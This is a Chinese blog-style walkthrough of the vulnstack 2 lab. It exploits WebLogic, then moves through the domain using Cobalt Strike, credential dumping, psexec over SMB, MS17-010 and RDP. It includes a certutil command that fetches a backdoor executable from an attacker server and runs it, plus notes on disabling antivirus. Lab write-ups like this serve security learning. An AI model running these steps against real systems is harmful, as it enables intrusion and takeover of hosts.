环境搭建

环境其实和vulnstack (一)差不多滴，只是变成有两台主机是具有两个IP的了。所有账号登录密码为1qaz@WSX，域管理员账号为administrator，密码和前面的一样。

Web：192.168.145.144(外)，192.168.215.31(内)
PC：192.168.145.143(外)，192.168.215.30(内)
DC：192.168.215.29(内)

Web主机添加一张网卡，网卡1选择NAT模式，网卡2选择LAN区段，LAN区段选择215网段即可。

本地连接1选择自动获取IP即可。

本地连接2配置如下。

PC主机也是和Web服务器一样的操作，本地连接1自动获取IP，本地连接2配置如下。

DC主机就一张网卡，选择LAN区段。本地连接如下。

最后在Web主机找到startWbLogic这个文件。

以管理员运行即可。

信息收集

nmap扫描一下网段，有143和144两台主机。

nmap -sP 192.168.145.* 

对143主机进行端口扫描，135端口开放可能存在Smb爆破，445端口开放可能存在ms17_010。

nmap -sT -T4 -sV -O -sC -p1-65535 192.168.145.143

对144主机进行端口扫描，多开启了个80端口和7001端口。

nmap -sT -T4 -sV -O -sC -p1-65535 192.168.145.144

访问网站看看，啥也没有。

扫一下网站目录，没发现有用的东西。

dirsearch -u http://192.168.145.144/ 

这是我想到144还开启了7001端口，而7001是weblogic服务的默认端口，直接加上端口再扫一下网站的目录。

getshell

CS上线

这次就有东西了，访问发现是一个Weblogic server网站后台。我试了试爆破，发现爆破不出来。直接利用Weblogic漏洞检测工具跑一下，还真有漏洞。

可以直接执行命令，相当于拿了一半的shell。

既然能命令执行，那么我该咋办呢。我一开始是想着写入一句话木马，但是当前目录下不是网站目录，你连接不了你的木马。其实可以CS生成一个后门放到服务器上面，然后再执行命令下载允许不就行了吗。生成后门我就不说了，直接执行命令下载到144主机上面。

certutil.exe -urlcache -split -f http://8.149.xxxx.xxxx:80/1111.exe 1111.exe

接着是执行它，便会上线CS。

start /b 1111.exe

MSF上线

其实这台主机的weblogic server的漏洞还是挺多的，但是上面的这个工具只能一个一个的去测试。

用下面这个脚本可以批量测试漏洞，但是它只能测2019之前的漏洞，2019之后的就测不了，上面工具可以。

下载地址：https://github.com/dr0op/WeblogicScan.git

python WeblogicScan.py 192.168.145.144  7001

不过在MSF中好像只有这个CVE-2019-2725可以利用，其它的漏洞都没有发现利用方式。

直接使用这个模块，设置好参数直接run。

成功获取meterpreter。

域内渗透

域内信息收集

判断是否存在域，返回如下说明存在一个名为de1ay.com的域。

net time /domain

现在进一步对域内的主机信息进行收集，可以用CS插件也可以用命令，查看域控主机名称。

ping一下域控名称，我们就知道域控的IP了。

ping DC.de1ay.com

查看域内用户。

net user /domain

查看域内的其它主机，可以看到还有一台PC主机。

net group "domain computers" /domain  # 查看域中的其他主机名

既然存在内网，那么我们进行一下端口探测。注意这里要先提权一下，直接用CS的插件进行MS14-058提权即可。先扫内网215网段，扫一下重要端口即可。

可以看到还存在30，29两台主机，31是我们的web服务器。从前面ping的域控名称可以知道，29是我们的域控，那么30就是我们的PC主机了，而且都开启了135，445端口。

再扫一下外网145网段。

可以看到还存在一台IP为143的主机，结合前面的信息我们可以判断是它是PC主机，也就是说PC主机是有两个网段的。

DC上线CS

既然都开启了135，445端口那么我们来尝试一下smb横移看看，先抓取密码。

创建smb监听器。

在目标列表右键29主机，选择psexec64。选择我们刚刚抓取的密码，监听器选择刚刚创建的smb监听器。

成功上线CS。

PC上线CS

接着是PC的上线，我试了试smb横移发现行，不太清楚为啥。

然后我用MSF使用第三个模块，扫了一下MS17_010漏洞。

发现有MS17_010漏洞。

利用攻击模块试试，但是没有成功，因为上面搜出来的0和1模块攻击对象都是x64的，而我们的PC是x86的。

使用2模块通过漏洞执行的，也不行，估计是PC上有安全软件啥的。

既然有安全软件，那么IPC连接传后门过去也不可能了，实际上IPC连接后没权限传递后门过去，不清楚为啥。前面我们还扫出143主机开放3389端口，我们可以试试远程桌面连接。用户名和密码就是我们刚刚抓取到的。

这里还是有些问题没搞懂，我远程连接之后登录de1ay/mssql,1qaz@WSX这个账号密码说我没权限啥的。

然后我用这个mssql ，1qaz@WSX也不行。其实到这里我有点蒙了，最后我又试试de1ay，1qaz@WSX这个账号密码，发现可以。

登录上去之后关掉360防护，那想干啥都行了。

总结

整体不算难的靶机，就是有些细节可能出了问题。比如smb横移不过去，远程桌面连接账号问题。

最后，以上仅为个人的拙见，如何有不对的地方，欢迎各位师傅指正与补充，有兴趣的师傅可以一起交流学习。